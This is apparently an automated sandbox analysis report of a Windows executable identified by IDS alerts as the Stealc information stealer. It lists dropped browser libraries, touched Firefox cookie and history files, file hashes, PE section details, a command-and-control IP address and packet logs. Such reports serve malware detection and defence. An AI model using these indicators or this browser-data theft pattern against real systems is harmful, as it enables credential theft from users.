Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.950417578978834
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'825'792 bytes
MD5:	894a16433a404abfcfe2097300da90ef
SHA1:	42ee9cdeb881344b5d833b443c7ef292156b897b
SHA256:	51561818e5a753c118dd3d88b3682894b5c7dafbba301aa68ce0666f5e6f5219
SHA512:	1381a6e60ddc4a58c8681a2b9f090ab82681b2bb30c3d068f0aa410b8eadf9adffa88c53d86e393702a86610c5610df054603ee94d478cae0e2f3a9b73efb92e
SSDEEP:	49152:hNILuQzRkE16oXh6Pth3i9KV6W7vTJEeyYQm:hWLue16oXh6Pth3GW7rPr
TLSH:	098533C66A279A6EC342C7764DFCC9A067E050C1985DFF3B24B66ACE71BFB410266C50
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xa94000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F8EA4B5D35Ah

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	9687ab8b84ad1944281c8512c90cac4f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x29d000	0x200	a3bcd494c24bbbfc767408bd4dbcedd1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rrlyrqvq	0x4fb000	0x198000	0x197800	29213d2c756b895871178bc82b50b14e	False	0.9951279716257668	data	7.955409843603842	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
tntpdtef	0x693000	0x1000	0x600	3ade06aa49210efc2d3e606cccd70b7b	False	0.5787760416666666	data	5.068173564558373	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x694000	0x3000	0x2200	519efb2762b93d7352fecaa59f1525e5	False	0.0642233455882353	DOS executable (COM)	0.7234001403242857	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-03T21:36:03.948006+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-03T21:36:04.180986+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-03T21:36:04.187170+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.5	49704	TCP
2024-10-03T21:36:04.417603+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-03T21:36:04.425772+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.5	49704	TCP
2024-10-03T21:36:05.533103+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-03T21:36:06.175790+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-03T21:36:11.163004+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-03T21:36:12.229705+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-03T21:36:13.406008+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-03T21:36:13.942122+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-03T21:36:15.618872+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-03T21:36:16.158768+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 21:36:02.994139910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:02.999560118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:02.999674082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:02.999824047 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:03.004965067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:03.701503038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:03.701647043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:03.705388069 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:03.710207939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:03.944286108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:03.948005915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:03.956386089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:03.961389065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:04.180922031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:04.180985928 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:04.181068897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:04.181108952 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:04.182359934 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:04.187170029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:04.417290926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:04.417431116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:04.417447090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:04.417603016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:04.417603016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:04.418278933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:04.418288946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:04.418355942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:04.419086933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:04.419135094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:04.420537949 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:04.425771952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:04.645040989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:04.645108938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:04.671720028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:04.671956062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:04.676553965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:04.676776886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:04.676789999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:04.676801920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:04.677089930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:04.677160025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:04.677203894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:05.532989979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:05.533102989 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:05.786870003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.097534895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.175647974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.175669909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.175685883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.175702095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.175790071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.175818920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.178289890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.178306103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.178352118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.178368092 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.179335117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.179351091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.179403067 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.180205107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.180258989 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.180349112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.180362940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.180377007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.180392027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.180399895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.180416107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.180422068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.180433035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.180440903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.180452108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.180473089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.180516005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.288234949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.288372040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.288388968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.288490057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.289230108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.289244890 CEST	80	49704	185.215.113.37	192.168.2.5
